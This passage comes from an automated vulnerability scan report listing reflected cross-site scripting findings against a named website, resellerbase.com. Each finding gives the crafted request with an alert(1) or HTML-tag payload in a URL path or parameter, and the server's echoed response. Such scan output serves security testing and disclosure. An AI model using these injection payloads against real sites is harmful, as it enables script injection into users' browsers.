Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295e990<script>alert(1)</script>66c41fb553e/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2072. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2715e<script>alert(1)</script>4d30ef1bb11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes2715e<script>alert(1)</script>4d30ef1bb11/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes2715e<script>alert(1)</script>4d30ef1bb11/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2073. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29372<script>alert(1)</script>3a45a353383 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/search.php29372<script>alert(1)</script>3a45a353383?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php29372<script>alert(1)</script>3a45a353383?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2074. http://www.resellerbase.com/detail/29/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 400fd<a>cd2b7853de6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search400fd<a>cd2b7853de6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search400fd<a>cd2b7853de6&opt=2 was not found on this server.</p>
...[SNIP]...

2.2075. http://www.resellerbase.com/detail/29/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7eb82<a>eb6c4927faa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...7eb82<a>eb6c4927faa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...7eb82<a>eb6c4927faa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2076. http://www.resellerbase.com/detail/29/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b244<script>alert(1)</script>7615a528717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2&3b244<script>alert(1)</script>7615a528717=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2&3b244<script>alert(1)</script>7615a528717=1 was not found on this server.</p>
...[SNIP]...

2.2077. http://www.resellerbase.com/detail/29/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b9b5f<a>f2915eee5f2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2b9b5f<a>f2915eee5f2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2b9b5f<a>f2915eee5f2 was not found on this server.</p>
...[SNIP]...

2.2078. http://www.resellerbase.com/detail/30/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d97e4<script>alert(1)</script>494b89f58c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild97e4<script>alert(1)</script>494b89f58c6/30/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild97e4<script>alert(1)</script>494b89f58c6/30/ was not found on this server.</p>
...[SNIP]...

2.2079. http://www.resellerbase.com/detail/30/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058c<script>alert(1)</script>bc46e15f2af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30a058c<script>alert(1)</script>bc46e15f2af/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30a058c<script>alert(1)</script>bc46e15f2af/ was not found on this server.</p>
...[SNIP]...

2.2080. http://www.resellerbase.com/detail/30/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1ac7e<script>alert(1)</script>baaa66a870a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/?1ac7e<script>alert(1)</script>baaa66a870a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.2081. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8399<script>alert(1)</script>d457dfcc58b16ba70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaild8399<script>alert(1)</script>d457dfcc58b16ba70/30/rating.php?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8399<script>alert(1)</script>d457dfcc58b16ba70/30/rating.php?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2082. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 82cc1<script>alert(1)</script>58d26bf1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail82cc1<script>alert(1)</script>58d26bf1c10/30/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail82cc1<script>alert(1)</script>58d26bf1c10/30/rating.php was not found on this server.</p>
...[SNIP]...

2.2083. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5890a<script>alert(1)</script>d4b028547f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/305890a<script>alert(1)</script>d4b028547f9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/305890a<script>alert(1)</script>d4b028547f9/rating.php was not found on this server.</p>
...[SNIP]...

2.2084. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload acd67<script>alert(1)</script>250a083af8f732a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30acd67<script>alert(1)</script>250a083af8f732a0/rating.php?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30acd67<script>alert(1)</script>250a083af8f732a0/rating.php?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2085. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99f79<script>alert(1)</script>a24c0a19c52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/rating.php99f79<script>alert(1)</script>a24c0a19c52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php99f79<script>alert(1)</script>a24c0a19c52 was not found on this server.</p>
...[SNIP]...

2.2086. http://www.resellerbase.com/detail/30/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76b26<script>alert(1)</script>0ac60ab7725c50f08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30/rating.php76b26<script>alert(1)</script>0ac60ab7725c50f08?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php76b26<script>alert(1)</script>0ac60ab7725c50f08?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2087. http://www.resellerbase.com/detail/30/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 553c0<script>alert(1)</script>72408b493537cc3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/30/rating.php/553c0<script>alert(1)</script>72408b493537cc3a5?id=30&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php/553c0<script>alert(1)</script>72408b493537cc3a5?id=30&rating=5 was not found on this server.</p>
...[SNIP]...

2.2088. http://www.resellerbase.com/detail/30/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc662<script>alert(1)</script>c18c888c24b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/rating.php?fc662<script>alert(1)</script>c18c888c24b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/rating.php?fc662<script>alert(1)</script>c18c888c24b=1 was not found on this server.</p>
...[SNIP]...

2.2089. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9054<script>alert(1)</script>04127e4da2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf9054<script>alert(1)</script>04127e4da2/30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf9054<script>alert(1)</script>04127e4da2/30/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2090. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/30/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 699bb<script>alert(1)</script>3e492f82f3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30699bb<script>alert(1)</script>3e492f82f3d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
